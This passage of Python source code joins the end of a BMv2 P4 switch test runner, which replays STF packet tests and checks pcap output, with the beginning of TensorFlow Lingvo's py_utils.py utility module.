raise Exception("Unexpected action arg " + key)
self.values[key] = value
def __str__(self):
result = ""
for f in self.action.args:
if result != "":
result += " "
result += self.values[f.name]
return result
def size(self):
return len(self.action.args)
class BMV2Action(object):
def __init__(self, jsonAction):
self.name = jsonAction["name"]
self.args = []
for a in jsonAction["runtime_data"]:
arg = BMV2ActionArg(a["name"], a["bitwidth"])
self.args.append(arg)
def __str__(self):
return self.name
def makeArgsInstance(self):
return BMV2ActionArguments(self)
class BMV2Table(object):
def __init__(self, jsonTable):
self.match_type = jsonTable["match_type"]
self.name = jsonTable["name"]
self.key = TableKey()
self.actions = {}
for k in jsonTable["key"]:
name = k["target"]
if isinstance(name, list):
name = ""
for t in k["target"]:
if name != "":
name += "."
name += t
self.key.append(name, k["match_type"])
actions = jsonTable["actions"]
action_ids = jsonTable["action_ids"]
for i in range(0, len(actions)):
actionName = actions[i]
actionId = action_ids[i]
self.actions[actionName] = actionId
def __str__(self):
return self.name
def makeKeyInstance(self):
return TableKeyInstance(self.key)
# Represents enough about the program executed to be
# able to invoke the BMV2 simulator, create a CLI file
# and test packets in pcap files.
class RunBMV2(object):
def __init__(self, folder, options, jsonfile):
self.clifile = folder + "/cli.txt"
self.jsonfile = jsonfile
self.stffile = None
self.folder = folder
self.pcapPrefix = "pcap"
self.interfaces = {}
self.expected = {} # for each interface number of packets expected
self.expectedAny = [] # interface on which any number of packets is fine
self.packetDelay = 0
self.options = options
self.json = None
self.tables = []
self.actions = []
self.switchLogFile = "switch.log" # .txt is added by BMv2
self.readJson()
self.cmd_line_args = getattr(options, 'switchOptions', ())
self.target_specific_cmd_line_args = getattr(options, 'switchTargetSpecificOptions', ())
def readJson(self):
with open(self.jsonfile) as jf:
self.json = json.load(jf)
for a in self.json["actions"]:
self.actions.append(BMV2Action(a))
for t in self.json["pipelines"][0]["tables"]:
self.tables.append(BMV2Table(t))
for t in self.json["pipelines"][1]["tables"]:
self.tables.append(BMV2Table(t))
def filename(self, interface, direction):
return self.folder + "/" + self.pcapPrefix + str(interface) + "_" + direction + ".pcap"
def interface_of_filename(self, f):
return int(os.path.basename(f).rstrip('.pcap').lstrip(self.pcapPrefix).rsplit('_', 1)[0])
def do_cli_command(self, cmd):
if self.options.verbose:
print(cmd)
self.cli_stdin.write(cmd + "\n")
self.cli_stdin.flush()
self.packetDelay = 1
def do_command(self, cmd):
if self.options.verbose:
print("STF Command:", cmd)
first, cmd = nextWord(cmd)
if first == "":
pass
elif first == "add":
self.do_cli_command(self.parse_table_add(cmd))
elif first == "setdefault":
self.do_cli_command(self.parse_table_set_default(cmd))
elif first == "mirroring_add":
# Pass through mirroring_add commands unchanged, with same
# arguments as expected by simple_switch_CLI
self.do_cli_command(first + " " + cmd)
elif first == "mc_mgrp_create" or first == "mc_node_create" or first == "mc_node_associate":
# Pass through multicast group commands unchanged, with
# same arguments as expected by simple_switch_CLI
self.do_cli_command(first + " " + cmd)
elif first == "packet":
interface, data = nextWord(cmd)
interface = int(interface)
data = ''.join(data.split())
time.sleep(self.packetDelay)
try:
self.interfaces[interface]._write_packet(HexToByte(data))
except ValueError:
reportError("Invalid packet data", data)
return FAILURE
self.interfaces[interface].flush()
self.packetDelay = 0
elif first == "expect":
interface, data = nextWord(cmd)
interface = int(interface)
data = ''.join(data.split())
if data != '':
self.expected.setdefault(interface, []).append(data)
else:
self.expectedAny.append(interface)
else:
if self.options.verbose:
print("ignoring stf command:", first, cmd)
def parse_table_set_default(self, cmd):
tableName, cmd = nextWord(cmd)
table = self.tableByName(tableName)
actionName, cmd = nextWord(cmd, "(")
action = self.actionByName(table, actionName)
actionArgs = action.makeArgsInstance()
cmd = cmd.strip(")")
while cmd != "":
word, cmd = nextWord(cmd, ",")
k, v = nextWord(word, ":")
actionArgs.set(k, v)
command = "table_set_default " + tableName + " " + actionName
if actionArgs.size():
command += " => " + str(actionArgs)
return command
def parse_table_add(self, cmd):
tableName, cmd = nextWord(cmd)
table = self.tableByName(tableName)
key = table.makeKeyInstance()
actionArgs = None
actionName = None
prio, cmd = nextWord(cmd)
number = re.compile("[0-9]+")
if not number.match(prio):
# not a priority; push back
cmd = prio + " " + cmd
prio = ""
while cmd != "":
if actionName != None:
# parsing action arguments
word, cmd = nextWord(cmd, ",")
k, v = nextWord(word, ":")
actionArgs.set(k, v)
else:
# parsing table key
word, cmd = nextWord(cmd)
if cmd.find("=") >= 0:
# This command retrieves a handle for the key
# This feature is currently not supported, so we just ignore the handle part
cmd = cmd.split("=")[0]
if word.find("(") >= 0:
# found action
actionName, arg = nextWord(word, "(")
action = self.actionByName(table, actionName)
actionArgs = action.makeArgsInstance()
cmd = arg + cmd
cmd = cmd.strip("()")
else:
k, v = nextWord(word, ":")
key.set(k, v)
if prio != "":
# Priorities in BMV2 seem to be reversed with respect to the stf file
# Hopefully 10000 is large enough
prio = str(10000 - int(prio))
command = "table_add " + table.name + " " + action.name + " " + str(key) + " => " + str(actionArgs)
if table.match_type == "ternary":
command += " " + prio
return command
def actionByName(self, table, actionName):
for name, id in table.actions.items():
action = self.actions[id]
if action.name == actionName:
return action
# Try again with suffixes
candidate = None
for name, id in table.actions.items():
action = self.actions[id]
if action.name.endswith(actionName):
if candidate is None:
candidate = action
else:
raise Exception("Ambiguous action name " + actionName + " in " + table.name)
if candidate is not None:
return candidate
raise Exception("No action", actionName, "in table", table)
def tableByName(self, tableName):
originalName = tableName
for t in self.tables:
if t.name == tableName:
return t
# If we can't find that try to match the tableName with a table suffix
candidate = None
for t in self.tables:
if t.name.endswith(tableName):
if candidate == None:
candidate = t
else:
raise Exception("Table name " + tableName + " is ambiguous between " +
candidate.name + " and " + t.name)
if candidate is not None:
return candidate
raise Exception("Could not find table " + tableName)
def interfaceArgs(self):
# return list of interface names suitable for bmv2
result = []
for interface in sorted(self.interfaces):
result.append("-i " + str(interface) + "@" + self.pcapPrefix + str(interface))
return result
def generate_model_inputs(self, stffile):
self.stffile = stffile
with open(stffile) as i:
for line in i:
line, comment = nextWord(line, "#")
first, cmd = nextWord(line)
if first == "packet" or first == "expect":
interface, cmd = nextWord(cmd)
interface = int(interface)
if not interface in self.interfaces:
# Can't open the interfaces yet, as that would block
ifname = self.interfaces[interface] = self.filename(interface, "in")
os.mkfifo(ifname)
return SUCCESS
def check_switch_server_ready(self, proc, thriftPort):
"""While the process is running, we check if the Thrift server has been
started. If the Thrift server is ready, we assume that the switch was
started successfully. This is only reliable if the Thrift server is
started at the end of the init process"""
while True:
if proc.poll() is not None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
result = sock.connect_ex(("localhost", thriftPort))
if result == 0:
return True
def run(self):
if self.options.verbose:
print("Running model")
wait = 0 # Time to wait before model starts running
if self.options.usePsa:
switch = "psa_switch"
switch_cli = "psa_switch_CLI"
else:
switch = "simple_switch"
switch_cli = "simple_switch_CLI"
concurrent = ConcurrentInteger(os.getcwd(), 1000)
rand = concurrent.generate()
if rand is None:
reportError("Could not find a free port for Thrift")
return FAILURE
thriftPort = str(9090 + rand)
rv = SUCCESS
try:
os.remove("/tmp/bmv2-%d-notifications.ipc" % rand)
except OSError:
pass
try:
runswitch = [FindExe("behavioral-model", switch),
"--log-file", self.switchLogFile, "--log-flush",
"--use-files", str(wait), "--thrift-port", thriftPort,
"--device-id", str(rand)] + self.interfaceArgs() + ["../" + self.jsonfile]
if self.cmd_line_args:
runswitch += self.cmd_line_args
if self.target_specific_cmd_line_args:
runswitch += ['--',] + self.target_specific_cmd_line_args
if self.options.verbose:
print("Running", " ".join(runswitch))
sw = subprocess.Popen(runswitch, cwd=self.folder)
def openInterface(ifname):
fp = self.interfaces[interface] = RawPcapWriter(ifname, linktype=0)
fp._write_header(None)
# Try to open input interfaces. Each time, we set a 2 second
# timeout. If the timeout expires we check if the bmv2 process is
# not running anymore. If it is, we check if we have exceeded the
# one minute timeout (exceeding this timeout is very unlikely and
# could mean the system is very slow for some reason). If one of the
# 2 conditions above is met, the test is considered a FAILURE.
start = time.time()
sw_timeout = 60
# open input interfaces
# DANGER -- it is critical that we open these fifos in the same
# order as bmv2, as otherwise we'll deadlock. Would be nice if we
# could open nonblocking.
for interface in sorted(self.interfaces):
ifname = self.interfaces[interface]
while True:
try:
signal.alarm(2)
openInterface(ifname)
signal.alarm(0)
except TimeoutException:
if time.time() - start > sw_timeout:
return FAILURE
if sw.poll() is not None:
return FAILURE
else:
break
# at this point we wait until the Thrift server is ready
# also useful if there are no interfaces
try:
signal.alarm(int(sw_timeout + start - time.time()))
self.check_switch_server_ready(sw, int(thriftPort))
signal.alarm(0)
except TimeoutException:
return FAILURE
time.sleep(0.1)
runcli = [FindExe("behavioral-model", switch_cli), "--thrift-port", thriftPort]
if self.options.verbose:
print("Running", " ".join(runcli))
try:
cli = subprocess.Popen(runcli, cwd=self.folder, stdin=subprocess.PIPE)
self.cli_stdin = cli.stdin
with open(self.stffile) as i:
for line in i:
line, comment = nextWord(line, "#")
self.do_command(line)
cli.stdin.close()
for interface, fp in self.interfaces.iteritems():
fp.close()
# Give time to the model to execute
time.sleep(2)
cli.terminate()
sw.terminate()
sw.wait()
except Exception as e:
cli.terminate()
sw.terminate()
sw.wait()
raise e
# This only works on Unix: negative returncode is
# minus the signal number that killed the process.
if sw.returncode != 0 and sw.returncode != -15: # 15 is SIGTERM
reportError(switch, "died with return code", sw.returncode);
rv = FAILURE
elif self.options.verbose:
print(switch, "exit code", sw.returncode)
cli.wait()
if cli.returncode != 0 and cli.returncode != -15:
reportError("CLI process failed with exit code", cli.returncode)
rv = FAILURE
finally:
try:
os.remove("/tmp/bmv2-%d-notifications.ipc" % rand)
except OSError:
pass
concurrent.release(rand)
if self.options.verbose:
print("Execution completed")
return rv
def comparePacket(self, expected, received):
received = ''.join(ByteToHex(str(received)).split()).upper()
expected = ''.join(expected.split()).upper()
if len(received) < len(expected):
reportError("Received packet too short", len(received), "vs", len(expected))
return FAILURE
for i in range(0, len(expected)):
if expected[i] == "*":
continue;
if expected[i] != received[i]:
reportError("Received packet ", received)
reportError("Packet different at position", i, ": expected", expected[i], ", received", received[i])
reportError("Full received packed is ", received)
return FAILURE
return SUCCESS
def showLog(self):
with open(self.folder + "/" + self.switchLogFile + ".txt") as a:
log = a.read()
print("Log file:")
print(log)
def checkOutputs(self):
if self.options.verbose:
print("Comparing outputs")
direction = "out"
for file in glob(self.filename('*', direction)):
interface = self.interface_of_filename(file)
if os.stat(file).st_size == 0:
packets = []
else:
try:
packets = rdpcap(file)
except:
reportError("Corrupt pcap file", file)
self.showLog()
return FAILURE
# Log packets.
if self.options.observationLog:
observationLog = open(self.options.observationLog, 'w')
for pkt in packets:
observationLog.write('%d %s\n' % (
interface,
''.join(ByteToHex(str(pkt)).split()).upper()))
observationLog.close()
# Check for expected packets.
if interface in self.expectedAny:
if interface in self.expected:
reportError("Interface " + interface + " has both expected with packets and without")
continue
if interface not in self.expected:
expected = []
else:
expected = self.expected[interface]
if len(expected) != len(packets):
reportError("Expected", len(expected), "packets on port", str(interface),
"got", len(packets))
self.showLog()
return FAILURE
for i in range(0, len(expected)):
cmp = self.comparePacket(expected[i], packets[i])
if cmp != SUCCESS:
reportError("Packet", i, "on port", str(interface), "differs")
return FAILURE
# remove successfully checked interfaces
if interface in self.expected:
del self.expected[interface]
if len(self.expected) != 0:
# didn't find all the expects we were expecting
reportError("Expected packects on ports", self.expected.keys(), "not received")
return FAILURE
else:
return SUCCESS
def run_model(options, tmpdir, jsonfile, testfile):
bmv2 = RunBMV2(tmpdir, options, jsonfile)
result = bmv2.generate_model_inputs(testfile)
if result != SUCCESS:
return result
result = bmv2.run()
if result != SUCCESS:
return result
result = bmv2.checkOutputs()
return result
######################### main
def usage(options):
print("usage:", options.binary, "[-v] [-p] [-observation-log <file>] <json file> <stf file>");
def main(argv):
options = Options()
options.binary = argv[0]
argv = argv[1:]
while len(argv) > 0 and argv[0][0] == '-':
if argv[0] == "-b":
options.preserveTmp = True
elif argv[0] == "-v":
options.verbose = True
elif argv[0] == "-p":
options.usePsa = True
elif argv[0] == '-observation-log':
if len(argv) == 1:
reportError("Missing argument", argv[0])
usage(options)
sys.exit(1)
options.observationLog = argv[1]
argv = argv[1:]
else:
reportError("Unknown option ", argv[0])
usage(options)
argv = argv[1:]
if len(argv) < 2:
usage(options)
return FAILURE
if not os.path.isfile(argv[0]) or not os.path.isfile(argv[1]):
usage(options)
return FAILURE
tmpdir = tempfile.mkdtemp(dir=".")
result = run_model(options, tmpdir, argv[0], argv[1])
if options.preserveTmp:
print("preserving", tmpdir)
else:
shutil.rmtree(tmpdir)
if options.verbose:
if result == SUCCESS:
print("SUCCESS")
else:
print("FAILURE", result)
return result
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
py_utils.py
|
# Lint as: python2, python3
# -*- coding: utf-8 -*-
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as py_collections
import contextlib
import functools
import hashlib
import math
import numbers
import pkgutil
import re
import threading
import traceback
import lingvo.compat as tf
from lingvo.core import hyperparams
from lingvo.core import ops
from lingvo.core import retry
from lingvo.core import symbolic
from lingvo.core import tshape
import numpy as np
import six
from six.moves import range
from six.moves import zip
from model_pruning.python import pruning
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import function
from tensorflow.python.tpu import tpu_function
from tensorflow.python.util import deprecation
# pylint: enable=g-direct-tensorflow-import
tf.flags.DEFINE_bool('enable_asserts', True,
'If False, we disable all asserts.')
tf.flags.DEFINE_bool('enable_check_numerics', True,
'If False, we bypass calls to CheckNumerics.')
tf.flags.DEFINE_bool('print_debug_tensors', False,
'Whether to print debug tensors.')
tf.flags.DEFINE_string(
'xla_device', '', 'If non-empty, can be cpu, gpu, or tpu (case sensitive)')
tf.flags.DEFINE_bool(
'use_resource_var', True,
'Use ResourceVariable instead of RefVariable; this option is '
'enabled by default and will be removed in the future.')
tf.flags.DEFINE_bool(
'tpu_compatible', False, 'Create variables in a way compatible with TPU. '
'This should be true for any job that will interact '
'with variables or a checkpoint that will be produced '
'or consumed by TPU')
tf.flags.DEFINE_bool(
'pin_vars_to_cpu', False,
'Pin variables to cpu:0. This is useful for weight-sharing / multi-core '
'inference on TPUs in which TPU core variables are managed via '
'TPUPartitionedCallOp.')
tf.flags.DEFINE_bool(
'no_identity_on_vars', False,
'Do not add tf.identity() on vars. This allows TPUPartitionedCallOp to use'
'variable handles directly for weight-sharing / multi-core '
'inference on TPUs.')
# NOTE: Using absl flags in libraries is frowned upon for several reasons:
#
# 1) They require app.run() or explicit flag parsing, preventing the use of
# these libraries in environments that don't look like normal binaries (colab
# notebooks).
#
# 2) They are process-level globals that cannot be scoped or configured except
# once during binary startup.
#
# Because py_utils is a library, no more flags should be used in this file; the
# existing flags are present for backwards compatibility. Instead, consider
# using a stack-scoped configuration object such as the Cluster object. We guard
# against issue 1 above by using _FromGlobal below, which uses the default value
# of the FLAG even if flags are unparsed.
FLAGS = tf.flags.FLAGS
def _FromGlobal(field_name):
"""Get 'field_name' from a global configuration object.
Currently the global configuration object used is FLAGS, but this may
change to Cluster() or an equivalent stack-scoped config object.
Args:
field_name: The string field name to look up.
Returns:
The value associated with the global configuration string 'field_name'.
"""
# TODO(b/145831327): check the field name in the current cluster object.
# If explicitly set, use that value instead of using the FLAG value.
# Now check the FLAGS object for backwards compatibility.
#
# If not explicitly set, get the field from the FLAGS object. If FLAGS
# have not been parsed yet, the default value of the flag will be used.
return FLAGS[field_name].value
ENQUEUE_OPS = '__lingvo_enqueue_ops'
TPU_EMBEDDING_LOAD_OPS = '__lingvo_tpu_embedding_load_ops'
TPU_EMBEDDING_RETRIEVE_OPS = '__lingvo_tpu_embedding_retrieve_ops'
TPU_EMBEDDING = '__tpu_embedding'
TPU_EMBEDDING_ACTIVATIONS = '__tpu_embedding_activations'
# pylint: disable=protected-access
deprecation._PRINT_DEPRECATION_WARNINGS = False
# pylint: enable=protected-access
def Assert(condition, data, *args, **kwargs):
if _FromGlobal('enable_asserts'):
return tf.Assert(condition, data, *args, **kwargs)
else:
return tf.no_op()
def assert_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_greater_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_greater(*args, **kwargs)
else:
return tf.no_op()
def assert_less_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_less_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_less(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_less(*args, **kwargs)
else:
return tf.no_op()
def assert_between(x, l, r, *args, **kwargs): # pylint: disable=invalid-name
return tf.group(
Assert(tf.reduce_all(tf.greater_equal(x, l)), [x], *args, **kwargs),
Assert(tf.reduce_all(tf.less(x, r)), [x], *args, **kwargs))
def assert_shape_match(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
kwargs['msg'] = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(
r'.*/', '', filepath), line, func)
return ops.assert_shape_match(*args, **kwargs)
else:
return tf.no_op()
def assert_same_dim0(xs, *args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return ops.assert_same_dim0(xs, *args, **kwargs)
else:
return tf.no_op()
def assert_even_divide(denorm, num): # pylint: disable=invalid-name
"""Asserts that denorm is evenly divided by num."""
denorm = tf.convert_to_tensor(denorm)
num = tf.convert_to_tensor(num)
if denorm.dtype not in (tf.int32, tf.int64):
    raise ValueError('denominator.dtype is not tf.int32 or tf.int64.')
if num.dtype not in (tf.int32, tf.int64):
raise ValueError('numerator.dtype is not tf.int32 or tf.int64.')
num = HasShape(num, GetShape(denorm))
quo = denorm // num
return assert_equal(quo * num, denorm)
def _CheckNumerics(x, message=None, *args, **kwargs):
if x.dtype.is_floating:
if 'name' not in kwargs:
kwargs['name'] = re.sub(r':\d+', '', x.name) + '_CheckNumerics'
return tf.check_numerics(x, message if message else x.name, *args, **kwargs)
else:
return x
def CheckNumerics(inp, message=None, *args, **kwargs):
"""Check numerics for tensors in inp."""
if not _FromGlobal('enable_check_numerics'):
return inp
if isinstance(inp, list):
return [_CheckNumerics(x, message, *args, **kwargs) for x in inp]
if isinstance(inp, tuple):
return tuple(_CheckNumerics(x, message, *args, **kwargs) for x in inp)
return _CheckNumerics(inp, message, *args, **kwargs)
def with_dependencies(dependencies, output_tensor): # pylint: disable=invalid-name
with tf.control_dependencies(dependencies):
return tf.identity(output_tensor)
@contextlib.contextmanager
def _PrintOptions(*args, **kwargs):
original = np.get_printoptions()
np.set_printoptions(*args, **kwargs)
yield
np.set_printoptions(**original)
def _Print(name, x):
with _PrintOptions(linewidth=1000):
tf.logging.info('%s = %s', name, np.array_repr(x))
def Log(value, prefix, **kwargs):
"""Prints out values of tensors.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Log(z, 'debug compute()', x=x, y=y)
Args:
value: A Tensor. Log happens after this tensor's computed.
prefix: Every tensor is logged with this prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
      these keywords.
Returns:
value is returned.
"""
# Ensures tensors are printed in order.
last = value
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Print, [prefix + ' : ' + k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def _Save(steps, prefix, key, val):
filename = '%s.%08d.%s.npy' % (six.ensure_text(prefix), steps,
six.ensure_text(key))
with tf.gfile.Open(filename, 'w') as outfile:
np.save(outfile, val)
def Save(value, filename_prefix, **kwargs):
"""Saves values of tensors into files.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Save(z, '/path/tmp', x=x, y=y, z=z)
Args:
value: A Tensor. Saving happens after this tensor is computed.
filename_prefix: Every tensor is saved with this filename prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
      these keywords.
Returns:
value is returned.
"""
last = value
steps = GetGlobalStep()
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Save, [steps, filename_prefix, k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def HasRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has the expected rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims == expected_rank, (
'Ranks did not match, got %d, '
'expected %d') % (tensor.shape.ndims, expected_rank)
return tensor
if _FromGlobal('enable_asserts'):
return with_dependencies([tf.assert_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def HasAtLeastRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has rank >= expected_rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims >= expected_rank, (
        'Rank of tensor %d is less than the expected minimum rank %d.') % (
tensor.shape.ndims, expected_rank)
return tensor
if _FromGlobal('enable_asserts'):
return with_dependencies(
[tf.assert_greater_equal(tf.rank(tensor), expected_rank)], tensor)
else:
return tensor
def GetRank(tensor):
"""Returns tensor's rank as an int if it's available, otherwise a Tensor.
Args:
tensor: The input tensor.
Returns:
Either an int or a Tensor for the rank of the input tensor.
"""
if tensor.shape.ndims is not None:
return tensor.shape.ndims # int
else:
return tf.rank(tensor) # Tensor
def HasShape(tensor, expected_shape, ndims=None):
"""Syntactic sugar for asserting that tensor has the expected shape.
Args:
tensor: A Tensor.
expected_shape: A Python list or a 1D tensor.
ndims: If not None, check only the first `ndims` dimensions of `tensor`.
Must be equal to the length of `expected_shape` if not None.
Returns:
The input `tensor`
Raises:
A runtime error if the assertion fails.
"""
if _FromGlobal('enable_asserts'):
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
msg = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(r'.*/', '',
filepath), line, func)
return with_dependencies([
ops.assert_shape_match(
tf.shape(tensor)[:ndims], expected_shape, msg=msg)
], tensor)
else:
return tensor
def GetShape(tensor, ndims=None):
"""Returns tensor's shape as a list which can be unpacked, unlike tf.shape.
Tries to return static shape if it's available. Note that this means
some of the outputs will be ints while the rest will be Tensors.
Args:
tensor: The input tensor.
ndims: If not None, returns the shapes for the first `ndims` dimensions.
"""
tensor = tf.convert_to_tensor(tensor)
dynamic_shape = tf.shape(tensor)
# Early exit for unranked tensor.
if tensor.shape.ndims is None:
if ndims is None:
return dynamic_shape
else:
return [dynamic_shape[x] for x in range(ndims)]
# Ranked tensor.
if ndims is None:
ndims = tensor.shape.ndims
else:
ndims = min(ndims, tensor.shape.ndims)
# Return mixture of static and dynamic dims.
static_shape = tensor.shape.as_list()
shapes = [
static_shape[x] if static_shape[x] is not None else dynamic_shape[x]
for x in range(ndims)
]
return shapes
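# Illustrative sketch of GetShape's mixed static/dynamic result (added comment,
# not part of the original library; assumes a TF1-style graph context as used by
# lingvo.compat):
#
#   x = tf.placeholder(tf.float32, shape=[None, 8])
#   GetShape(x)       # -> [<batch-size Tensor>, 8]: dim 0 is dynamic, dim 1 static
#   GetShape(x, 1)    # -> [<batch-size Tensor>]: only the first dimension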
def GetSize(tensor):
shape = GetShape(tensor)
if isinstance(shape, tf.Tensor):
return tf.size(tensor)
prod = 1
for d in shape:
prod = prod * d
return prod
def use_xla(): # pylint: disable=invalid-name
res = _FromGlobal('xla_device')
if res:
assert res in ('', 'cpu', 'gpu', 'tpu')
return res
def use_tpu(): # pylint: disable=invalid-name
res = _FromGlobal('xla_device') == 'tpu'
if res:
assert not _FromGlobal('enable_asserts') # asserts not supported on tpu
return res
def tpu_compat(): # pylint: disable=invalid-name
return use_tpu() or _FromGlobal('tpu_compatible')
def use_resource_variables(): # pylint: disable=invalid-name
return _FromGlobal('use_resource_var') or tpu_compat()
@contextlib.contextmanager
def outside_all_rewrites(): # pylint: disable=invalid-name
with tf.control_dependencies(None):
yield
class _ThreadLocalStack(threading.local):
def __init__(self):
super(_ThreadLocalStack, self).__init__()
self.stack = []
# TODO(jamesqin): remove once b/147439702 is fixed.
_OUTSIDE_COMPILATION = threading.local()
def RunOnTpuHost(func, *args, **kwargs):
r"""Runs the given function call on TPU host.
Invokes func(\*args, \*\*kwargs) directly if not running on tpu.
Args:
func: the function to invoke.
*args: args of func
**kwargs: kwargs of func
Returns:
The function return value.
"""
if use_tpu() and not getattr(_OUTSIDE_COMPILATION, 'on', False):
_OUTSIDE_COMPILATION.on = True
res = tf.tpu.outside_compilation(func, *args, **kwargs)
_OUTSIDE_COMPILATION.on = False
else:
res = func(*args, **kwargs)
return res
def tpu_host(func): # pylint: disable=invalid-name
r"""Decorates a python function to only run on TPU hosts.
This function has no effect when running on CPU/GPU.
Example::
@py_utils.tpu_host()
def ComputeWER(self):
# Call a custom op computing WER.
Args:
func: the function to invoke
Returns:
A TPU-host only function
"""
def Wrapped(*args, **kwargs):
return RunOnTpuHost(func, *args, **kwargs)
return Wrapped
_tpu_device_assignment = None
def SetTpuDeviceAssignment(tpu_device_assignment):
global _tpu_device_assignment
if _tpu_device_assignment is not None:
tf.logging.warning('tpu_device_assignment was already set, '
'overwriting with new assignment.')
_tpu_device_assignment = tpu_device_assignment
# This function should be called in unit tests only.
def ClearTpuDevice():
global _tpu_device_assignment
_tpu_device_assignment = None
def GetTpuDeviceAssignment():
return _tpu_device_assignment
def SessionConfig(soft_placement=True, inline=True, cluster_def=None):
"""Returns a session config proto.
Args:
soft_placement: Turns allow_soft_placement on iff True.
inline: Turns do_function_inlining on iff True.
cluster_def: A tf.train.ClusterDef describing the cluster.
Returns:
A TF session config proto.
"""
session_config = tf.ConfigProto(
allow_soft_placement=soft_placement,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=inline)),
cluster_def=cluster_def)
# Disable layout optimizer which increases GPU memory usage.
session_config.graph_options.rewrite_options.layout_optimizer = (
rewriter_config_pb2.RewriterConfig.OFF)
return session_config
def AssertIsCompatible(a, b):
assert a.IsCompatible(b), ('%s vs %s' % (a, b))
def SetShapes(dst_nmap, src_nmap):
"""Set shapes in dst_nmap using those in src_nmap."""
AssertIsCompatible(src_nmap, dst_nmap)
for src, dst in zip(src_nmap.Flatten(), dst_nmap.Flatten()):
dst.set_shape(src.shape)
def Dtypes(nmap_list):
"""Returns all tensors' data types in a list."""
return [v.dtype for v in Flatten(nmap_list)]
def Flatten(x):
"""Flattens 'x' by extracting tensors from nested structures to a list."""
return tf.nest.flatten(x)
def Pack(tmpl, values):
"""Packs 'values' according to 'tmpl'."""
return tf.nest.pack_sequence_as(tmpl, values)
def Transform(fn, *v):
"""Replaces every nested value x in 'v' with fn(x) and returns the result."""
return tf.nest.map_structure(fn, *v)
def IsCompatible(lhs, rhs):
"""Returns true if lhs and rhs are compatible."""
try:
tf.nest.assert_same_structure(lhs, rhs)
return True
except (ValueError, TypeError):
return False
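# Small sketch tying the nest helpers above together (added for illustration,
# not part of the original library):
#
#   tmpl = {'a': tf.constant(1), 'b': [tf.constant(2), tf.constant(3)]}
#   flat = Flatten(tmpl)                    # [<1>, <2>, <3>]
#   doubled = Transform(lambda t: t * 2, tmpl)
#   rebuilt = Pack(tmpl, flat)              # same structure as tmpl
#   IsCompatible(tmpl, doubled)             # -> True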
_NAME_PATTERN = re.compile('[A-Za-z_][A-Za-z0-9_]*')
class NestedMap(dict):
"""A simple helper to maintain a dict.
It is a sub-class of dict with the following extensions/restrictions:
- It supports attr access to its members (see examples below).
- Member keys have to be valid identifiers.
E.g.::
>>> foo = NestedMap()
>>> foo['x'] = 10
>>> foo.y = 20
>>> assert foo.x * 2 == foo.y
"""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
# keys in this list are not allowed in a NestedMap.
_RESERVED_KEYS = set(dir(dict))
# sentinel value for deleting keys used in Filter.
_DELETE = object()
def __init__(self, *args, **kwargs):
super(NestedMap, self).__init__(*args, **kwargs)
for key in self.keys():
assert isinstance(key, six.string_types), (
'Key in a NestedMap has to be a six.string_types. Currently type: %s,'
' value: %s' % (str(type(key)), str(key)))
NestedMap.CheckKey(key)
assert key not in NestedMap._RESERVED_KEYS, ('%s is a reserved key' % key)
def __setitem__(self, key, value):
# Make sure key is a valid expression and is not one of the reserved
# attributes.
assert isinstance(key, six.string_types), (
'Key in a NestedMap has to be a six.string_types. Currently type: %s, '
'value: %s' % (str(type(key)), str(key)))
NestedMap.CheckKey(key)
assert key not in NestedMap._RESERVED_KEYS, ('%s is a reserved key' % key)
super(NestedMap, self).__setitem__(key, value)
def __setattr__(self, name, value):
self.__setitem__(name, value)
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError('%s; available attributes: %s' %
(e, sorted(list(self.keys()))))
def __delattr__(self, name):
try:
